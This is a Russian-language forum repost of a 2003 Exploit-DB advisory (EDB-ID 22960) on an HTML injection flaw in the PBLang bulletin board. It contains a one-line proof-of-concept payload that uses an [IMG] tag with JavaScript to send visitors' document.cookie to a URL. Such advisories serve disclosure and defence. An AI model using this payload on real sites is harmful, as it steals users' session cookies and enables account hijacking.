- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 22960
- Проверка EDB
-
- Пройдено
- Автор
- QUAN VAN TRUONG
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2003-07-28
Код:
source: https://www.securityfocus.com/bid/8286/info
PBLang is prone to an HTML injection vulnerability. An attacker may exploit this issue by including hostile HTML and script code encapsulated in PBLang tags, when posting to the bulletin board. Attacker supplied code may be rendered in the web browser of a user who views these areas of the site. This would occur in the security context of the site hosting PBLang.
[IMG]javascript:window.open("http://localhost/docs.php?docs="+escape
(document.cookie), "subwindows", "height=100,width=486")[/IMG]
- Источник
- www.exploit-db.com